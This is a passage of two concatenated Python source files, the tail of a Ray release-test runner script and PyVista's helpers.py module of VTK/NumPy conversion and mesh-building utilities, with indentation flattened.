logger.info("All commands finished.")
_process_finished_command(
session_controller=session_controller,
scd_id=scd_id,
results=latest_result)
should_terminate = True
else:
rest_time = timeout - time.time() + session_state["start_time"]
logger.info(f"Test command should continue running "
f"for {rest_time} seconds")
result_queue.put(
State("END", time.time(), {
"status": "kickoff",
"last_logs": "Test is still running"
}))
except Exception as e:
logger.error(e, exc_info=True)
logs = str(e)
if scd_id is not None:
try:
logs = get_command_logs(session_controller, scd_id,
test_config.get("log_lines", 50))
logs += f"\n{str(e)}"
except Exception as e2:
logger.error(e2, exc_info=True)
result_queue.put(
State("END", time.time(), {
"status": "error",
"last_logs": logs
}))
should_terminate = True
finally:
if should_terminate:
logger.warning("Terminating session")
_cleanup_session(sdk, session_id)
if not check_progress:
process = multiprocessing.Process(target=_run, args=(logger, ))
else:
process = multiprocessing.Process(
target=_check_progress, args=(logger, ))
build_timeout = test_config["run"].get("build_timeout", 1800)
prepare_timeout = test_config["run"].get("prepare_timeout", timeout)
project_url = anyscale_project_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"])
logger.info(f"Link to project: {project_url}")
msg = f"This will now run test {test_name}."
if smoke_test:
msg += " This is a smoke test."
if is_long_running:
msg += " This is a long running test."
logger.info(msg)
logger.info(f"Starting process with timeout {timeout} "
f"(prepare timeout {prepare_timeout}, "
f"build timeout {build_timeout})")
process.start()
# The timeout time will be updated after the build finished
# Build = App config + compute template build and session start
timeout_time = time.time() + build_timeout
result = {}
while process.is_alive():
try:
state: State = result_queue.get(timeout=1)
except (Empty, TimeoutError):
if time.time() > timeout_time:
stop_event.set()
logger.warning("Process timed out.")
if not is_long_running:
logger.warning("Terminating process in 10 seconds.")
time.sleep(10)
logger.warning("Terminating process now.")
process.terminate()
else:
logger.info("Process is long running. Give 2 minutes to "
"fetch result and terminate.")
start_terminate = time.time()
                    while (time.time() < start_terminate + 120
                           and process.is_alive()):
time.sleep(1)
if process.is_alive():
logger.warning("Terminating forcefully now.")
process.terminate()
else:
logger.info("Long running results collected.")
break
continue
if not isinstance(state, State):
raise RuntimeError(f"Expected `State` object, got {result}")
if state.state == "CMD_PREPARE":
# Reset timeout after build finished
timeout_time = state.timestamp + prepare_timeout
if state.state == "CMD_RUN":
# Reset timeout after prepare command or build finished
timeout_time = state.timestamp + timeout
elif state.state == "END":
result = state.data
break
while not result_queue.empty():
state = result_queue.get_nowait()
result = state.data
logger.info("Final check if everything worked.")
try:
result.setdefault("status", "error (status not found)")
except (TimeoutError, Empty):
result = {"status": "timeout", "last_logs": "Test timed out."}
logger.info(f"Final results: {result}")
log_results_and_artifacts(result)
if not keep_results_dir:
logger.info(f"Removing results dir {temp_dir}")
shutil.rmtree(temp_dir)
else:
# Write results.json
with open(os.path.join(temp_dir, "results.json"), "wt") as fp:
json.dump(result, fp)
out_dir = os.path.expanduser(GLOBAL_CONFIG["RELEASE_RESULTS_DIR"])
logger.info(f"Moving results dir {temp_dir} to persistent location "
f"{out_dir}")
shutil.rmtree(out_dir, ignore_errors=True)
shutil.copytree(temp_dir, out_dir)
logger.info(f"Dir contents: {os.listdir(out_dir)}")
return result
def run_test(test_config_file: str,
test_name: str,
project_id: str,
commit_url: str,
category: str = "unspecified",
smoke_test: bool = False,
no_terminate: bool = False,
kick_off_only: bool = False,
check_progress: bool = False,
report: bool = True,
keep_results_dir: bool = False,
session_name: Optional[str] = None,
             app_config_id_override: Optional[str] = None) -> Dict[str, Any]:
with open(test_config_file, "rt") as f:
test_configs = yaml.safe_load(f)
test_config_dict = {}
for test_config in test_configs:
name = test_config.pop("name")
test_config_dict[name] = test_config
if test_name not in test_config_dict:
raise ValueError(
f"Test with name `{test_name}` not found in test config file "
f"at `{test_config_file}`.")
test_config = test_config_dict[test_name]
if smoke_test and "smoke_test" in test_config:
smoke_test_config = test_config.pop("smoke_test")
test_config = _deep_update(test_config, smoke_test_config)
local_dir = os.path.dirname(test_config_file)
if "local_dir" in test_config:
# local_dir is relative to test_config_file
local_dir = os.path.join(local_dir, test_config["local_dir"])
if test_config["run"].get("use_connect"):
assert not kick_off_only, \
"--kick-off-only is unsupported when running with " \
"Anyscale connect."
assert not check_progress, \
"--check is unsupported when running with Anyscale connect."
if test_config.get("artifacts", {}):
            logger.error(
                "Saving artifacts is not yet supported when running with "
                "Anyscale connect.")
# Perform necessary driver side setup.
driver_setup_script = test_config.get("driver_setup", None)
if driver_setup_script:
run_bash_script(local_dir, driver_setup_script)
result = run_test_config(
local_dir,
project_id,
test_name,
test_config,
commit_url,
session_name=session_name,
smoke_test=smoke_test,
no_terminate=no_terminate,
kick_off_only=kick_off_only,
check_progress=check_progress,
upload_artifacts=report,
keep_results_dir=keep_results_dir,
app_config_id_override=app_config_id_override)
status = result.get("status", "invalid")
if kick_off_only:
if status != "kickoff":
raise RuntimeError("Error kicking off test.")
logger.info("Kicked off test. It's now up to the `--check` "
"part of the script to track its process.")
return {}
else:
# `--check` or no kick off only
if status == "nosession":
logger.info(f"No running session found for test {test_name}, so "
f"assuming everything is fine.")
return {}
if status == "kickoff":
logger.info(f"Test {test_name} is still running.")
return {}
last_logs = result.get("last_logs", "No logs.")
test_suite = os.path.basename(test_config_file).replace(".yaml", "")
report_kwargs = dict(
test_suite=test_suite,
test_name=test_name,
status=status,
last_logs=last_logs,
results=result.get("results", {}),
artifacts=result.get("artifacts", {}),
category=category,
)
if not has_errored(result):
            # Check whether alert criteria are met if the test succeeded
alert = maybe_get_alert_for_result(report_kwargs)
if alert:
# If we get an alert, the test failed.
logger.error(f"Alert has been raised for "
f"{test_suite}/{test_name} "
f"({category}): {alert}")
result["status"] = "error (alert raised)"
report_kwargs["status"] = "error (alert raised)"
# For printing/reporting to the database
report_kwargs["last_logs"] = alert
last_logs = alert
else:
logger.info(f"No alert raised for test "
f"{test_suite}/{test_name} "
f"({category}) - the test successfully passed!")
if report:
report_result(**report_kwargs)
else:
logger.info(f"Usually I would now report the following results:\n"
f"{report_kwargs}")
if has_errored(result):
raise RuntimeError(last_logs)
return report_kwargs
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument(
"--test-config", type=str, required=True, help="Test config file")
parser.add_argument("--test-name", type=str, help="Test name in config")
parser.add_argument(
"--ray-wheels", required=False, type=str, help="URL to ray wheels")
parser.add_argument(
"--no-terminate",
action="store_true",
default=False,
help="Don't terminate session after failure")
parser.add_argument(
"--report",
action="store_true",
default=False,
help="Do not report any results or upload to S3")
parser.add_argument(
"--kick-off-only",
action="store_true",
default=False,
help="Kick off only (don't wait for command to finish)")
parser.add_argument(
"--check",
action="store_true",
default=False,
help="Check (long running) status")
parser.add_argument(
"--keep-results-dir",
action="store_true",
default=False,
help="Keep results in directory (named RELEASE_RESULTS_DIR), e.g. "
"for Buildkite artifact upload.")
parser.add_argument(
"--category",
type=str,
default="unspecified",
help="Category name, e.g. `release-1.3.0` (will be saved in database)")
parser.add_argument(
"--smoke-test", action="store_true", help="Finish quickly for testing")
parser.add_argument(
"--session-name",
required=False,
type=str,
help="Name of the session to run this test.")
parser.add_argument(
"--app-config-id-override",
required=False,
type=str,
help=("An app config ID, which will override the test config app "
"config."))
args, _ = parser.parse_known_args()
if not GLOBAL_CONFIG["ANYSCALE_PROJECT"]:
raise RuntimeError(
"You have to set the ANYSCALE_PROJECT environment variable!")
ray_wheels = args.ray_wheels or os.environ.get("RAY_WHEELS", "")
maybe_fetch_api_token()
if ray_wheels:
logger.info(f"Using Ray wheels provided from URL/commit: "
f"{ray_wheels}")
url = commit_or_url(str(ray_wheels))
logger.info(f"Resolved url link is: {url}")
# Overwrite with actual URL
os.environ["RAY_WHEELS"] = url
elif not args.check:
url = find_ray_wheels(
GLOBAL_CONFIG["RAY_REPO"],
GLOBAL_CONFIG["RAY_BRANCH"],
GLOBAL_CONFIG["RAY_VERSION"],
)
if not url:
raise RuntimeError(f"Could not find wheels for "
f"Ray {GLOBAL_CONFIG['RAY_VERSION']}, "
f"branch {GLOBAL_CONFIG['RAY_BRANCH']}")
# RAY_COMMIT is set by commit_or_url and find_ray_wheels
populate_wheels_sanity_check(os.environ.get("RAY_COMMIT", ""))
test_config_file = os.path.abspath(os.path.expanduser(args.test_config))
# Override it from the global variable.
report = GLOBAL_CONFIG["REPORT_RESULT"]
if report.lower() == "1" or report.lower() == "true":
report = True
else:
report = args.report
run_test(
test_config_file=test_config_file,
test_name=args.test_name,
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"],
commit_url=url,
category=args.category,
smoke_test=args.smoke_test,
no_terminate=args.no_terminate or args.kick_off_only,
kick_off_only=args.kick_off_only,
check_progress=args.check,
report=report,
session_name=args.session_name,
keep_results_dir=args.keep_results_dir,
app_config_id_override=args.app_config_id_override,
)
helpers.py
"""Supporting functions for polydata and grid objects."""
import os
import collections.abc
import enum
import logging
import signal
import sys
from threading import Thread
import threading
import traceback
from typing import Optional
import numpy as np
from pyvista import _vtk
import pyvista
from .fileio import from_meshio
from . import transformations
class FieldAssociation(enum.Enum):
"""Represents which type of vtk field a scalar or vector array is associated with."""
POINT = _vtk.vtkDataObject.FIELD_ASSOCIATION_POINTS
CELL = _vtk.vtkDataObject.FIELD_ASSOCIATION_CELLS
NONE = _vtk.vtkDataObject.FIELD_ASSOCIATION_NONE
ROW = _vtk.vtkDataObject.FIELD_ASSOCIATION_ROWS
def get_vtk_type(typ):
"""Look up the VTK type for a given numpy data type.
Corrects for string type mapping issues.
Parameters
----------
typ : numpy.dtype
Numpy data type.
Returns
-------
int
Integer type id specified in ``vtkType.h``
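    Examples
    --------
    A minimal sketch; the exact integer depends on the VTK build
    (``VTK_DOUBLE`` is typically ``11``).
    >>> import numpy as np
    >>> get_vtk_type(np.dtype(np.float64))  # doctest:+SKIP
    11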
"""
typ = _vtk.get_vtk_array_type(typ)
    # ``get_vtk_array_type`` reports string arrays with a char type id;
    # remap it to ``VTK_STRING`` (13) so strings round-trip correctly.
    if typ == 3:
        return 13
return typ
def vtk_bit_array_to_char(vtkarr_bint):
"""Cast vtk bit array to a char array.
Parameters
----------
vtkarr_bint : vtk.vtkBitArray
VTK binary array.
Returns
-------
vtk.vtkCharArray
VTK char array.
Notes
-----
This performs a copy.
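    Examples
    --------
    A minimal sketch, assuming ``vtk`` is importable:
    >>> import vtk
    >>> bits = vtk.vtkBitArray()
    >>> for bit in [0, 1, 1]:
    ...     _ = bits.InsertNextValue(bit)
    >>> vtk_bit_array_to_char(bits).GetNumberOfTuples()
    3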
"""
vtkarr = _vtk.vtkCharArray()
vtkarr.DeepCopy(vtkarr_bint)
return vtkarr
def vtk_id_list_to_array(vtk_id_list):
"""Convert a vtkIdList to a NumPy array.
Parameters
----------
vtk_id_list : vtk.vtkIdList
VTK ID list.
Returns
-------
numpy.ndarray
Array of IDs.
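    Examples
    --------
    A minimal sketch, assuming ``vtk`` is importable:
    >>> import vtk
    >>> id_list = vtk.vtkIdList()
    >>> for i in [0, 5, 10]:
    ...     _ = id_list.InsertNextId(i)
    >>> vtk_id_list_to_array(id_list)
    array([ 0,  5, 10])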
"""
return np.array([vtk_id_list.GetId(i) for i in range(vtk_id_list.GetNumberOfIds())])
def convert_string_array(arr, name=None):
"""Convert a numpy array of strings to a vtkStringArray or vice versa.
Parameters
----------
arr : numpy.ndarray
Numpy string array to convert.
name : str, optional
Name to set the vtkStringArray to.
Returns
-------
vtkStringArray
VTK string array.
Notes
-----
Note that this is terribly inefficient. If you have ideas on how
to make this faster, please consider opening a pull request.
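    Examples
    --------
    A minimal round trip (array contents are illustrative):
    >>> import numpy as np
    >>> vtkarr = convert_string_array(np.array(['a', 'b', 'c']), name='letters')
    >>> vtkarr.GetNumberOfValues()
    3
    >>> convert_string_array(vtkarr)  # doctest:+SKIP
    array(['a', 'b', 'c'], dtype='<U1')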
"""
if isinstance(arr, np.ndarray):
vtkarr = _vtk.vtkStringArray()
########### OPTIMIZE ###########
for val in arr:
vtkarr.InsertNextValue(val)
################################
if isinstance(name, str):
vtkarr.SetName(name)
return vtkarr
# Otherwise it is a vtk array and needs to be converted back to numpy
############### OPTIMIZE ###############
nvalues = arr.GetNumberOfValues()
return np.array([arr.GetValue(i) for i in range(nvalues)], dtype='|U')
########################################
def convert_array(arr, name=None, deep=False, array_type=None):
"""Convert a NumPy array to a vtkDataArray or vice versa.
Parameters
----------
arr : np.ndarray or vtkDataArray
        A numpy array or vtkDataArray to convert.
name : str, optional
The name of the data array for VTK.
deep : bool, optional
If input is numpy array then deep copy values.
array_type : int, optional
        VTK array type ID as specified in ``vtkType.h``.
Returns
-------
    vtkDataArray or numpy.ndarray
        The converted array. If the input is a :class:`numpy.ndarray`,
        a ``vtkDataArray`` is returned; if the input is a ``vtkDataArray``,
        a NumPy ``ndarray`` is returned.
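    Examples
    --------
    Round-trip a small numeric array (a sketch):
    >>> import numpy as np
    >>> vtk_data = convert_array(np.arange(3.0), name='values')
    >>> vtk_data.GetName()
    'values'
    >>> convert_array(vtk_data)
    array([0., 1., 2.])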
"""
if arr is None:
return
if isinstance(arr, np.ndarray):
if arr.dtype is np.dtype('O'):
arr = arr.astype('|S')
arr = np.ascontiguousarray(arr)
if arr.dtype.type in (np.str_, np.bytes_):
# This handles strings
vtk_data = convert_string_array(arr)
else:
# This will handle numerical data
arr = np.ascontiguousarray(arr)
vtk_data = _vtk.numpy_to_vtk(num_array=arr, deep=deep,
array_type=array_type)
if isinstance(name, str):
vtk_data.SetName(name)
return vtk_data
# Otherwise input must be a vtkDataArray
if not isinstance(arr, (_vtk.vtkDataArray, _vtk.vtkBitArray, _vtk.vtkStringArray)):
raise TypeError(f'Invalid input array type ({type(arr)}).')
# Handle booleans
if isinstance(arr, _vtk.vtkBitArray):
arr = vtk_bit_array_to_char(arr)
# Handle string arrays
if isinstance(arr, _vtk.vtkStringArray):
return convert_string_array(arr)
    # Convert from vtkDataArray to NumPy
return _vtk.vtk_to_numpy(arr)
def is_pyvista_dataset(obj):
"""Return ``True`` if the object is a PyVista wrapped dataset.
Parameters
----------
obj : anything
Any object to test.
Returns
-------
bool
``True`` when the object is a :class:`pyvista.DataSet`.
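    Examples
    --------
    A quick check on a built-in mesh versus a plain list:
    >>> import pyvista
    >>> is_pyvista_dataset(pyvista.Sphere())
    True
    >>> is_pyvista_dataset([0, 1, 2])
    False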
"""
return isinstance(obj, (pyvista.DataSet, pyvista.MultiBlock))
def point_array(obj, name):
"""Return point array of a pyvista or vtk object.
Parameters
----------
obj : pyvista.DataSet or vtk.vtkDataSet
PyVista or VTK dataset.
name : str
Name of the array.
Returns
-------
numpy.ndarray
Wrapped array.
"""
vtkarr = obj.GetPointData().GetAbstractArray(name)
return convert_array(vtkarr)
def field_array(obj, name):
"""Return field data of a pyvista or vtk object.
Parameters
----------
obj : pyvista.DataSet or vtk.vtkDataSet
PyVista or VTK dataset.
name : str
Name of the array.
Returns
-------
numpy.ndarray
Wrapped array.
"""
vtkarr = obj.GetFieldData().GetAbstractArray(name)
return convert_array(vtkarr)
def cell_array(obj, name):
"""Return cell array of a pyvista or vtk object.
Parameters
----------
obj : pyvista.DataSet or vtk.vtkDataSet
PyVista or VTK dataset.
name : str
Name of the array.
Returns
-------
numpy.ndarray
Wrapped array.
"""
vtkarr = obj.GetCellData().GetAbstractArray(name)
return convert_array(vtkarr)
def row_array(obj, name):
"""Return row array of a vtk object.
Parameters
----------
    obj : pyvista.Table or vtk.vtkTable
        PyVista or VTK table.
name : str
Name of the array.
Returns
-------
numpy.ndarray
Wrapped array.
"""
vtkarr = obj.GetRowData().GetAbstractArray(name)
return convert_array(vtkarr)
def parse_field_choice(field):
"""Return a field association object for a given field type string.
Parameters
----------
field : str, FieldAssociation
        Name of the field (e.g., ``'cell'``, ``'field'``, ``'point'``,
``'row'``).
Returns
-------
pyvista.FieldAssociation
Field association.
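    Examples
    --------
    String aliases map onto the enum (reprs shown are illustrative):
    >>> parse_field_choice('cells')  # doctest:+SKIP
    <FieldAssociation.CELL: 1>
    >>> parse_field_choice('p')  # doctest:+SKIP
    <FieldAssociation.POINT: 0>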
"""
if isinstance(field, str):
field = field.strip().lower()
if field in ['cell', 'c', 'cells']:
field = FieldAssociation.CELL
elif field in ['point', 'p', 'points']:
field = FieldAssociation.POINT
elif field in ['field', 'f', 'fields']:
field = FieldAssociation.NONE
elif field in ['row', 'r']:
field = FieldAssociation.ROW
else:
raise ValueError(f'Data field ({field}) not supported.')
elif isinstance(field, FieldAssociation):
pass
else:
raise ValueError(f'Data field ({field}) not supported.')
return field
def get_array(mesh, name, preference='cell', err=False) -> Optional[np.ndarray]:
"""Search point, cell and field data for an array.
Parameters
----------
mesh : pyvista.DataSet
Dataset to get the array from.
name : str
        The name of the array to get.
preference : str, optional
When scalars is specified, this is the preferred array type to
search for in the dataset. Must be either ``'point'``,
``'cell'``, or ``'field'``.
err : bool, optional
Whether to throw an error if array is not present.
Returns
-------
pyvista.pyvista_ndarray or ``None``
Requested array. Return ``None`` if there is no array
matching the ``name`` and ``err=False``.
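    Examples
    --------
    A sketch: fetch a point array by name from a simple mesh.
    >>> import pyvista
    >>> mesh = pyvista.Sphere()
    >>> mesh['heights'] = mesh.points[:, 2]
    >>> arr = get_array(mesh, 'heights', preference='point')
    >>> arr.shape == (mesh.n_points,)
    True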
"""
if isinstance(mesh, _vtk.vtkTable):
arr = row_array(mesh, name)
if arr is None and err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
return arr
parr = point_array(mesh, name)
carr = cell_array(mesh, name)
farr = field_array(mesh, name)
preference = parse_field_choice(preference)
if sum([array is not None for array in (parr, carr, farr)]) > 1:
if preference == FieldAssociation.CELL:
return carr
elif preference == FieldAssociation.POINT:
return parr
elif preference == FieldAssociation.NONE:
return farr
else:
raise ValueError(f'Data field ({preference}) not supported.')
if parr is not None:
return parr
elif carr is not None:
return carr
elif farr is not None:
return farr
elif err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
return None
def get_array_association(mesh, name, preference='cell', err=False) -> FieldAssociation:
"""Return the array association.
Parameters
----------
mesh : Dataset
Dataset to get the array association from.
name : str
The name of the array.
preference : str, optional
When scalars is specified, this is the preferred array type to
search for in the dataset. Must be either ``'point'``,
``'cell'``, or ``'field'``.
err : bool, optional
Boolean to control whether to throw an error if array is not
present.
Returns
-------
pyvista.FieldAssociation
Association of the array. If array is not present and ``err`` is
``False``, ``FieldAssociation.NONE`` is returned.
"""
if isinstance(mesh, _vtk.vtkTable):
arr = row_array(mesh, name)
if arr is None and err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
return FieldAssociation.ROW
# with multiple arrays, return the array preference if possible
parr = point_array(mesh, name)
carr = cell_array(mesh, name)
farr = field_array(mesh, name)
arrays = [parr, carr, farr]
preferences = [FieldAssociation.POINT, FieldAssociation.CELL, FieldAssociation.NONE]
preference = parse_field_choice(preference)
if preference not in preferences:
raise ValueError(f'Data field ({preference}) not supported.')
matches = [pref for pref, array in zip(preferences, arrays) if array is not None]
# optionally raise if no match
if not matches:
if err:
raise KeyError(f'Data array ({name}) not present in this dataset.')
return FieldAssociation.NONE
# use preference if it applies
if preference in matches:
return preference
# otherwise return first in order of point -> cell -> field
return matches[0]
def vtk_points(points, deep=True):
"""Convert numpy array or array-like to a ``vtkPoints`` object.
Parameters
----------
points : numpy.ndarray or sequence
Points to convert. Should be 1 or 2 dimensional. Accepts a
single point or several points.
deep : bool, optional
Perform a deep copy of the array. Only applicable if
``points`` is a :class:`numpy.ndarray`.
Returns
-------
vtk.vtkPoints
The vtkPoints object.
Examples
--------
>>> import pyvista
>>> import numpy as np
>>> points = np.random.random((10, 3))
>>> vpoints = pyvista.vtk_points(points)
>>> vpoints # doctest:+SKIP
(vtkmodules.vtkCommonCore.vtkPoints)0x7f0c2e26af40
"""
points = np.asanyarray(points)
# verify is numeric
if not np.issubdtype(points.dtype, np.number):
raise TypeError('Points must be a numeric type')
# check dimensionality
if points.ndim == 1:
points = points.reshape(-1, 3)
elif points.ndim > 2:
raise ValueError('Dimension of ``points`` should be 1 or 2, not '
f'{points.ndim}')
# verify shape
if points.shape[1] != 3:
raise ValueError('Points array must contain three values per point. '
f'Shape is {points.shape} and should be (X, 3)')
# points must be contiguous
points = np.require(points, requirements=['C'])
vtkpts = _vtk.vtkPoints()
vtk_arr = _vtk.numpy_to_vtk(points, deep=deep)
vtkpts.SetData(vtk_arr)
return vtkpts
def line_segments_from_points(points):
"""Generate non-connected line segments from points.
Assumes points are ordered as line segments and an even number of
points.
Parameters
----------
points : numpy.ndarray
Points representing line segments. An even number must be
given as every two vertices represent a single line
segment. For example, two line segments would be represented
as ``np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])``.
Returns
-------
pyvista.PolyData
PolyData with lines and cells.
Examples
--------
This example plots two line segments at right angles to each other.
>>> import pyvista
>>> import numpy as np
>>> points = np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
    >>> lines = pyvista.line_segments_from_points(points)
>>> lines.plot()
"""
if len(points) % 2 != 0:
raise ValueError("An even number of points must be given to define each segment.")
# Assuming ordered points, create array defining line order
n_points = len(points)
n_lines = n_points // 2
lines = np.c_[(2 * np.ones(n_lines, np.int_),
np.arange(0, n_points-1, step=2),
np.arange(1, n_points+1, step=2))]
poly = pyvista.PolyData()
poly.points = points
poly.lines = lines
return poly
def lines_from_points(points, close=False):
"""Make a connected line set given an array of points.
Parameters
----------
points : np.ndarray
Points representing the vertices of the connected
segments. For example, two line segments would be represented
as ``np.array([[0, 0, 0], [1, 0, 0], [1, 1, 0]])``.
close : bool, optional
If ``True``, close the line segments into a loop.
Returns
-------
pyvista.PolyData
PolyData with lines and cells.
Examples
--------
>>> import numpy as np
>>> import pyvista
>>> points = np.array([[0, 0, 0], [1, 0, 0], [1, 1, 0]])
>>> poly = pyvista.lines_from_points(points)
>>> poly.plot(line_width=5)
"""
poly = pyvista.PolyData()
poly.points = points
cells = np.full((len(points)-1, 3), 2, dtype=np.int_)
cells[:, 1] = np.arange(0, len(points)-1, dtype=np.int_)
cells[:, 2] = np.arange(1, len(points), dtype=np.int_)
if close:
cells = np.append(cells, [[2, len(points)-1, 0]], axis=0)
poly.lines = cells
return poly
def make_tri_mesh(points, faces):
"""Construct a ``pyvista.PolyData`` mesh using points and faces arrays.
Construct a mesh from an Nx3 array of points and an Mx3 array of
triangle indices, resulting in a mesh with N vertices and M
triangles. This function does not require the standard VTK
"padding" column and simplifies mesh creation.
Parameters
----------
points : np.ndarray
Array of points with shape ``(N, 3)`` storing the vertices of the
triangle mesh.
faces : np.ndarray
Array of indices with shape ``(M, 3)`` containing the triangle
indices.
Returns
-------
pyvista.PolyData
PolyData instance containing the triangle mesh.
Examples
--------
This example discretizes the unit square into a triangle mesh with
nine vertices and eight faces.
>>> import numpy as np
>>> import pyvista
>>> points = np.array([[0, 0, 0], [0.5, 0, 0], [1, 0, 0], [0, 0.5, 0],
... [0.5, 0.5, 0], [1, 0.5, 0], [0, 1, 0], [0.5, 1, 0],
... [1, 1, 0]])
>>> faces = np.array([[0, 1, 4], [4, 7, 6], [2, 5, 4], [4, 5, 8],
... [0, 4, 3], [3, 4, 6], [1, 2, 4], [4, 8, 7]])
>>> tri_mesh = pyvista.make_tri_mesh(points, faces)
>>> tri_mesh.plot(show_edges=True, line_width=5)
"""
if points.shape[1] != 3:
raise ValueError("Points array should have shape (N, 3).")
if faces.ndim != 2 or faces.shape[1] != 3:
raise ValueError("Face array should have shape (M, 3).")
cells = np.empty((faces.shape[0], 4), dtype=faces.dtype)
cells[:, 0] = 3
cells[:, 1:] = faces
return pyvista.PolyData(points, cells)
def vector_poly_data(orig, vec):
"""Create a pyvista.PolyData object composed of vectors.
Parameters
----------
orig : numpy.ndarray
Array of vector origins.
vec : numpy.ndarray
Array of vectors.
Returns
-------
pyvista.PolyData
Mesh containing the ``orig`` points along with the
``'vectors'`` and ``'mag'`` point arrays representing the
        vectors and the magnitude of the vectors at each point.
Examples
--------
Create basic vector field. This is a point cloud where each point
has a vector and magnitude attached to it.
>>> import pyvista
>>> import numpy as np
>>> x, y = np.meshgrid(np.linspace(-5,5,10),np.linspace(-5,5,10))
>>> points = np.vstack((x.ravel(), y.ravel(), np.zeros(x.size))).T
>>> u = x/np.sqrt(x**2 + y**2)
>>> v = y/np.sqrt(x**2 + y**2)
>>> vectors = np.vstack((u.ravel()**3, v.ravel()**3, np.zeros(u.size))).T
>>> pdata = pyvista.vector_poly_data(points, vectors)
>>> pdata.point_data.keys()
['vectors', 'mag']
Convert these to arrows and plot it.
>>> pdata.glyph(orient='vectors', scale='mag').plot()
"""
# shape, dimension checking
if not isinstance(orig, np.ndarray):
orig = np.asarray(orig)
if not isinstance(vec, np.ndarray):
vec = np.asarray(vec)
if orig.ndim != 2:
orig = orig.reshape((-1, 3))
elif orig.shape[1] != 3:
raise ValueError('orig array must be 3D')
if vec.ndim != 2:
vec = vec.reshape((-1, 3))
elif vec.shape[1] != 3:
raise ValueError('vec array must be 3D')
# Create vtk points and cells objects
vpts = _vtk.vtkPoints()
vpts.SetData(_vtk.numpy_to_vtk(np.ascontiguousarray(orig), deep=True))
npts = orig.shape[0]
cells = np.empty((npts, 2), dtype=pyvista.ID_TYPE)
cells[:, 0] = 1
cells[:, 1] = np.arange(npts, dtype=pyvista.ID_TYPE)
vcells = pyvista.utilities.cells.CellArray(cells, npts)
# Create vtkPolyData object
pdata = _vtk.vtkPolyData()
pdata.SetPoints(vpts)
pdata.SetVerts(vcells)
# Add vectors to polydata
name = 'vectors'
vtkfloat = _vtk.numpy_to_vtk(np.ascontiguousarray(vec), deep=True)
vtkfloat.SetName(name)
pdata.GetPointData().AddArray(vtkfloat)
pdata.GetPointData().SetActiveVectors(name)
# Add magnitude of vectors to polydata
name = 'mag'
scalars = (vec * vec).sum(1)**0.5
vtkfloat = _vtk.numpy_to_vtk(np.ascontiguousarray(scalars), deep=True)
vtkfloat.SetName(name)
pdata.GetPointData().AddArray(vtkfloat)
pdata.GetPointData().SetActiveScalars(name)
return pyvista.PolyData(pdata)
def trans_from_matrix(matrix): # pragma: no cover
"""Convert a vtk matrix to a numpy.ndarray.
DEPRECATED: Please use ``array_from_vtkmatrix``.
"""
# import needs to happen here to prevent a circular import
from pyvista.core.errors import DeprecationError
raise DeprecationError('DEPRECATED: Please use ``array_from_vtkmatrix``.')
def array_from_vtkmatrix(matrix):
"""Convert a vtk matrix to an array.
Parameters
----------
matrix : vtk.vtkMatrix3x3 or vtk.vtkMatrix4x4
The vtk matrix to be converted to a ``numpy.ndarray``.
Returned ndarray has shape (3, 3) or (4, 4) as appropriate.
Returns
-------
numpy.ndarray
Numpy array containing the data from ``matrix``.
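    Examples
    --------
    A minimal sketch (``vtkMatrix4x4`` defaults to the identity):
    >>> import vtk
    >>> array_from_vtkmatrix(vtk.vtkMatrix4x4()).shape
    (4, 4)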
"""
if isinstance(matrix, _vtk.vtkMatrix3x3):
shape = (3, 3)
elif isinstance(matrix, _vtk.vtkMatrix4x4):
shape = (4, 4)
else:
raise TypeError('Expected vtk.vtkMatrix3x3 or vtk.vtkMatrix4x4 input,'
f' got {type(matrix).__name__} instead.')
array = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
array[i, j] = matrix.GetElement(i, j)
return array
def vtkmatrix_from_array(array):
"""Convert a ``numpy.ndarray`` or array-like to a vtk matrix.
Parameters
----------
array : numpy.ndarray or array-like
The array or array-like to be converted to a vtk matrix.
Shape (3, 3) gets converted to a ``vtk.vtkMatrix3x3``, shape (4, 4)
gets converted to a ``vtk.vtkMatrix4x4``. No other shapes are valid.
Returns
-------
vtk.vtkMatrix3x3 or vtk.vtkMatrix4x4
VTK matrix.
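    Examples
    --------
    A minimal sketch:
    >>> import numpy as np
    >>> matrix = vtkmatrix_from_array(np.eye(4))
    >>> matrix.GetElement(3, 3)
    1.0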
"""
array = np.asarray(array)
if array.shape == (3, 3):
matrix = _vtk.vtkMatrix3x3()
elif array.shape == (4, 4):
matrix = _vtk.vtkMatrix4x4()
else:
raise ValueError(f'Invalid shape {array.shape}, must be (3, 3) or (4, 4).')
m, n = array.shape
for i in range(m):
for j in range(n):
matrix.SetElement(i, j, array[i, j])
return matrix
def is_meshio_mesh(obj):
"""Test if passed object is instance of ``meshio.Mesh``.
Parameters
----------
obj
Any object.
Returns
-------
bool
        ``True`` if ``obj`` is a ``meshio.Mesh``.
"""
try:
import meshio
return isinstance(obj, meshio.Mesh)
except ImportError:
return False
def wrap(dataset):
"""Wrap any given VTK data object to its appropriate PyVista data object.
Other formats that are supported include:
* 2D :class:`numpy.ndarray` of XYZ vertices
* 3D :class:`numpy.ndarray` representing a volume. Values will be scalars.
* 3D :class:`trimesh.Trimesh` mesh.
* 3D :class:`meshio.Mesh` mesh.
Parameters
----------
dataset : :class:`numpy.ndarray`, :class:`trimesh.Trimesh`, or VTK object
Dataset to wrap.
Returns
-------
pyvista.DataSet
The PyVista wrapped dataset.
Examples
--------
Wrap a numpy array representing a random point cloud.
>>> import numpy as np
>>> import pyvista
>>> points = np.random.random((10, 3))
>>> cloud = pyvista.wrap(points)
>>> cloud # doctest:+SKIP
PolyData (0x7fc52db83d70)
N Cells: 10
N Points: 10
X Bounds: 1.123e-01, 7.457e-01
Y Bounds: 1.009e-01, 9.877e-01
Z Bounds: 2.346e-03, 9.640e-01
N Arrays: 0
Wrap a Trimesh object.
>>> import trimesh
>>> import pyvista
>>> points = [[0, 0, 0], [0, 0, 1], [0, 1, 0]]
>>> faces = [[0, 1, 2]]
>>> tmesh = trimesh.Trimesh(points, faces=faces, process=False)
>>> mesh = pyvista.wrap(tmesh)
>>> mesh # doctest:+SKIP
PolyData (0x7fc55ff27ad0)
